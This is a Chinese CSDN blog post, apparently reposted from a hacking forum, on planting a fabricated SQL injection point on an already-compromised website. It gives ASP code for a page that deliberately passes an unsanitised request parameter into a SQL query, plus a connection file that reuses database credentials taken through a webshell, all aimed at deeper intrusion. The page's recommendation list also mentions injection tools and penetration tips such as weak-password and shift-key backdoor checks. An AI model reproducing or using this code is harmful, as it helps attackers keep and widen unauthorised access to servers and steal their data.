自己构造注入点方便入侵

最新推荐文章于 2023-10-18 11:47:03 发布
最新推荐文章于 2023-10-18 11:47:03 发布
阅读量312 收藏
点赞数
文章标签: 注入 入侵 web shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kclax/article/details/90574362
版权

自己构造注入点方便入侵

今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息

这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!

首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和

密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表

因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:

程序代码

<%
set rs=server.createobject(“ADODB.recordset”)
id = request(“id”)
strSQL = “select * from admin where id=” & id
rs.open strSQL,conn,1,3
rs.close
%>

把strSQL = “select * from admin where id=” & id 这句话里面的admin换成要伪造的表名,注意必须存在

你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!

然后就要构造一个连接数据库的文件了,代码如下:
程序代码
<%
strSQLServerName = “000.000.000.000” '服务器名称或地址
strSQLDBUserName = “sqlname” '数据库帐号
strSQLDBPassword = “sqlpass” '数据库密码
strSQLDBName = “sqldataname” '数据库名称
Set conn = Server.CreateObject(“ADODB.Connection”)
strCon = “Provider=SQLOLEDB.1;Persist Security Info=False;Server=” & strSQLServerName & “;User ID=” & strSQLDBUserName & “;Password=” & strSQLDBPassword & “;Database=” & strSQLDBName & “;”
conn.open strCon
%>

这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,

就这样,正常情况下,就OK了,伪造成功⋯⋯

       如果有什么问题可以提出来大家一起探讨解决。
Coisini、
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【Spring】构造注入(理解)
爱写bug的王六六
11-05 3676
构造注入(推荐使用name) Spring调用类的有参数构造方法,创建对象同时给属性赋值 语法: <bean id="xxx" class="yyy"> <constructor-arg />: 表示一个构造方法的形参 标签有属性: name :构造方法形参名 index:构造方法的参数位置 value:简单类型的形参值
Spring三种注入方法(set注入构造方法注入、p标签注入
柒七的博客
02-05 3074
一、构造注入 编写一个User类 public class User { private String name; //名字 private Integer age; //性别 private Date date; //日期 依赖的对象 //通过构造为成员属性进行初始化 public User(String name, Integer age, Date date) { this.name = name; ...
Spring中构造注入详解
x2656271356的博客
10-18 1329
Spring中构造注入详解
Sprng依赖注入(三):构造方法注入是如何工作的?
凡夫编程
02-23 1360
这是Spring依赖注入系列的第三篇,前两篇主要分析了Spring bean依赖属性注入的两种方式,是字段注入和setter方法注入,单独比较这两种方式,会发现其过程和工作原理非常类似,那么构造方法注入会不会也和前两种比较类似呢?本篇文章将会揭晓答案。构造方法注入方法以@Autowired注解为例,即把@Autowired注解标记在目标bean的构造方法上,而构造方法的入参数是引用bean类型;构造方法注入示例示例主要内容:1、定义Teachert类; 2、定义Student类;
构造函数的注入(Java学习笔记)
m0_59803718的博客
03-25 2584
SpringBean的属性注入方式:构造函数注入,setter注入,短命名空间注入
自己动手编写SQL注入漏洞扫描工具
12-31
标题中的“自己动手编写SQL注入漏洞扫描工具”指的是创建一个能够自动检测Web应用程序是否存在SQL注入漏洞的软件。SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意的SQL语句来操纵数据库,获取...
渗透入侵\超级SQL注入工具 SSQLInjection V1.0.zip
07-15
1. 自动化扫描:工具可以自动检测目标网站是否存在SQL注入漏洞,通过对各种可能的注入发送测试数据来识别漏洞。 2. SQL语法支持:支持多种数据库管理系统(如MySQL、Oracle、SQL Server等)的SQL语法,以便在不同...
超级注入利用工具
12-19
SQL注入是一种常见的网络安全威胁,它利用了应用程序对用户输入数据处理不当的情况,允许攻击者通过构造恶意的SQL语句来执行非授权的操作,如获取敏感数据、修改数据库内容或控制整个系统。此工具的更新着重解决了...
万能注入
04-28
使用【万能注入器.exe】这个执行文件,用户可以设置各种参数,包括但不限于目标URL、请求方法(GET或POST)、注入位置、测试字符集等。这些参数的设置直接影响到注入器的工作效果和效率。在进行测试时,注入器会...
啊d--网站注入工具
03-18
在使用"啊D注入工具 V2.32.exe"时,用户应确保遵循合法的测试原则,只对自己拥有权限的网站进行扫描,避免非法入侵他人系统。同时,"d99.mdb"可能是一个数据库文件,用于存储扫描结果、配置信息或者工具的内置规则库...
Spring的构造注入
梦想也许遥不可及,但重要的是追梦的过程,用博客记录自己的成长,记录自己一步一步向上攀登的印记
04-18 3983
1.开发步骤2.构造方法的重载2.1参数个数不同2.2构造参数个数相同时3.注入总结 注入:通过Spring的配置文件,为成员变量赋值 Set注入:Spring调用Set方法,通过配置文件,为成员变量赋值 构造注入:Spring调用构造方法,通过配置文件,为成员变量赋值 1.开发步骤 提供有参构造方法 public class Customer implements Serializable { private String name; private int age; pu.
构造注入
m0_72963823的博客
10-09 3505
构造注入
第五章--构造注入
豆恭梓的博客
11-04 197
1.注⼊:通过Spring的配置⽂件,为成员变量赋值 2.Set注⼊:Spring调⽤Set⽅法 通过配置⽂件 为成员变量赋值 3.构造注⼊:Spring调⽤构造⽅法 通过配置⽂件 为成员变量赋值 1.构造注入的步骤 1 提供有参构造⽅法 public class Customer implements Serializable { private String name; private int age; public Customer(String name,int age) { this.n
Spring框架学习(二):set注入构造注入
qq_45676647的博客
01-02 1210
set注入构造注入
Spring学习--构造注入(课程总结)
VVU25的博客
03-18 258
构造注入 Student.java public class Student { private String name; private int age; //引用类型 private School school; public Student() { System.out.println("Student无参构造方法"); } //创建有参数的构造方法 public Student(String myname,int m
有手就行:零基础渗透网站步骤
热门推荐
jklbnm12的博客
07-03 2万+
前言:渗透技巧小总结,希望大家喜欢! 渗透技巧 1.拿到一个网站后,先进行扫描,对网站全局进行爬行。 2.某些cms的网站设置过滤不严,直接在网站后面加上admin/session.asp 或 admin/left.asp 可直接进入后台 3.入侵网站之前连接下3389,可以连接上的话先尝试弱口令,不行就按5次shift键,看看有没有shift后门 4.访问后台地址时弹出提示框“请登陆” 把地址记出来(复制不了)放到“网页源代码分析器”里,选择浏览器-拦截跳转勾选–查看即可直接进入后台。 5.:jav.
【Spring杂烩】一起探讨@Autowired属性注入,设值注入构造注入注入时机
长路漫漫的歇脚处
02-26 4994
探讨Spring属性注入,设值注入构造注入注入时机
构造注入
Javaer
04-09 119
注入:通过Spring的配置文件,为成员变量赋值 Set注入:Spring调用Set方法 通过配置文件 为成员变量赋值 构造注入:Spring调用构造方法 通过配置文件 为成员变量赋值 1. 开发步骤 提供有参构造方法 public class Customer implements Serializable { private String name; private int age; public Customer(String name, int age) {
SQL注入——渗透day07
qq_62716256的博客
09-01 1008
wql注入
springboot构造注入
最新发布
01-17
构造注入是Spring Boot中一种常见的依赖注入方式,它通过在类的构造函数中声明依赖关系来实现。下面是一个示例: ```java @Service public class UserService { private UserRepository userRepository; @...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值